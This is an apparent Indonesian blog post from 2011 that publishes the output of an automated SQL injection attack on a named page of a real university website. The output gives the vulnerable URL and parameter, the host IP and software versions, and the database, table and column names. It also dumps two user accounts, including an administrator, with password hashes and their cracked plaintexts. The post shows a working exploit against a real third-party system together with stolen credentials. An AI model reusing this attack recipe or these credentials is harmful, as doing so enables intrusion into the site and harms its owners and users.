Rabu, 15 Juni 2011

SQL Injection Vulnerability on UGM.AC.ID

Code:

Analyzing http://im.ugm.ac.id/berita.php?post_id=17
Host IP: 175.111.91.126
Web Server: Apache/2.0.63 (CentOS)
Powered-by: PHP/5.1.6
Keyword Found: Pendidikan
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 6
Injection type is String (')
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: sso
Data Base Found: information_schema
Data Base Found: database
Data Base Found: databases
Data Base Found: ink
Data Base Found: kjm
Data Base Found: komunikasi
Data Base Found: mysql
Data Base Found: rssjab
Data Base Found: sso
Data Base Found: test
Data Base Found: v2

Count(table_name) of information_schema.tables Where table_schema=0x73736F is 3
Tables found: berita,posts,users
Count(column_name) of information_schema.columns Where table_schema=0x73736F AND table_name=0x7573657273 is 2
Columns found: username,password
Count(*) of sso.users is 2
Data Found: password=03eb6b61109d07646b66bbecd80ee44a=proved
Data Found: username=administrator
Data Found: password=b34b40ca8771c48c204e55f927376885=okedeh
Data Found: username=zudha

Tidak ada komentar:

Posting Komentar